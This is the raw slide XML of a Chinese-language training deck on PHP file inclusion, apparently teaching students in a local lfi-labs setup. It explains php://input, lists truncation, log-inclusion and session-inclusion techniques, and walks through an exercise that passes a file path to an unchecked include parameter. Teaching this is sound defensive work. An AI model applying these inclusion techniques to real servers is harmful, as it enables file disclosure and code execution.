                <p:tags r:id="rId12"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId13"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId15"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId16"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId17"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId18"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId19"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId20"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId21"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId22"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId23"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId24"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId25"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId26"/>
              </p:custDataLst>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 name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId27"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="137401" y="363869"/>
            <a:ext cx="652329" cy="652329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909320" y="393065"/>
            <a:ext cx="6873875" cy="5772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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId28"/>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input</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758825" y="1421130"/>
            <a:ext cx="10418445" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>php://input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>是一个伪协议流，用于读取原始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>数据，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>上来的数据当作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码进行处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>。这对于处理HTTP POST请求时传递的数据（特别是JSON或XML格式的内容）非常有用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804545" y="3123565"/>
            <a:ext cx="10351770" cy="2245360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>设置请求头 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>application/json</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>// {"name": "John", "age": 30}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$jsonData = file_get_contents("php://input");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> $data = json_decode($jsonData, true); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据转换为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数组</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo"Name: " . $data['name'] . "&lt;br&gt;"; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo"Age: " . $data['age'];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>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其他利用方式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2737485" y="2109470"/>
            <a:ext cx="6453505" cy="3107690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>截断</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>长度截断（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>windows256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>linux 4096</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>包含文件日志</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>session</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/>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5669280" cy="922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文件包含随堂练</a:t>
            </a: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习</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LFI</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66700" y="1153160"/>
            <a:ext cx="11236960" cy="2553335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>在网络安全领域中，实践是检验真理的唯一标准。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>lfi-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>是一款专注于本地文件包含（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>LFI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>）、远程文件包含（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>RFI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>）和命令注入漏洞练习的工具包。这个由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>jose nazario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>创建的项目，不仅提供了学习这些高级渗透测试技巧的机会，还为测试检测产品和开发攻防技能搭建了实验平台。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>PHP STUDY</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>然后将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>LFI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>文件下载到本地的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>WWW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>目录下</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>在浏览器地址栏输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>127.0.0.1/+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>你自己命名的文件夹名称</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="3773805"/>
            <a:ext cx="5835650" cy="2865755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>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LFI-1</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635500" y="1784985"/>
            <a:ext cx="7231380" cy="4629150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="424180" y="3699510"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>然后点开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>LFI-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，出现如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>界面</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求</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5720" y="1202055"/>
            <a:ext cx="11965305" cy="5518785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>1. GET 请求（获取资源、查询数据等场景）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    参数传递方式：GET 请求将参数附加在 URL 的查询字符串中。例如：http://example.com/page?name=John&amp;age=30。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    数据长度限制：由于 URL 的长度有限，GET 请求的传递数据大小也受到限制，通常为几千字节。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    安全性：因为参数在 URL 中明文显示，不适合传输敏感信息（如密码）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>POST 请求（适用于提交表单、上传文件或执行对服务器资源有影响的操作，如登录、注册和提交订单等。）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>参数传递方式：POST 请求将数据放在请求体中，而不是 URL 中。客户端发送的请求示例：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>POST /submit-form HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Host: example.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Content-Type: application/x-www-form-urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>name=John&amp;age=30</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据长度限制：理论上没有限制，可以传输更大数据量。服务器配置和客户端实现可能会对其大小施加限制。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全性：参数在请求体中传输，相比 GET 更适合传输敏感数据（但仍需配合 HTTPS 使用，才能保证数据加密传输）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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LFI-1</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05435" y="2051685"/>
            <a:ext cx="11308080" cy="2849880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294640" y="1524000"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>首先看第一个实验</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>例子</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="351790" y="5200650"/>
            <a:ext cx="9584055" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法传递</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>参数，然后通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行，因此可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>传入恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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LFI-1</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636520" y="1292860"/>
            <a:ext cx="7632700" cy="2306955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>创建一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件，里面随便写点什么，然后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>保存</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>复制文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>路径</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在框里输入文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>路径</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注意：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>C://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件夹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件夹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>.txt</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742950" y="1292860"/>
            <a:ext cx="1557655" cy="368300"/>
          </a:xfrm>
